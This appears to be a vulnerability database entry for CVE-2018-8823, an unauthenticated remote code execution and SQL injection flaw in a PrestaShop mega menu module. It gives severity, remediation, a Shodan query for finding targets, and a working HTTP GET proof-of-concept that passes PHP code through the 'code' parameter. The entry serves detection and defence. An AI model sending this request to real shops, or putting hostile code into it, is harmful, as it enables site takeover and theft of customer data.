🔙 목록으로 돌아가기

CVE-2018-8823: PrestaShop Responsive Mega Menu Module - Remote Code Execution

TitlePrestaShop Responsive Mega Menu Module - Remote Code Execution
AuthorMaStErChO
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary PHP code or SQL commands through the module, leading to complete PrestaShop compromise and access to customer data.
RemediationRemove the vulnerable Responsive Mega Menu Pro module or upgrade to a patched version.
CVSS Score9.8
EPSS Score0.90063
CVE IDCVE-2018-8823
CWE IDCWE-94
Shodan Queryhttp.component:"prestashop"
Tags cve cve2018 prestashop rce sqli responsive_mega_menu_pro_project vuln

🔍 Vulnerability Description

The ‘Responsive Mega Menu’ module for PrestaShop is prone to a remote code execution and SQL injection vulnerability. modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop allows remote attackers to execute an SQL injection or remote code execution through function calls in the code parameter.

🌐 HTTP Request

GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(2094)) HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-8823.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-8823.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A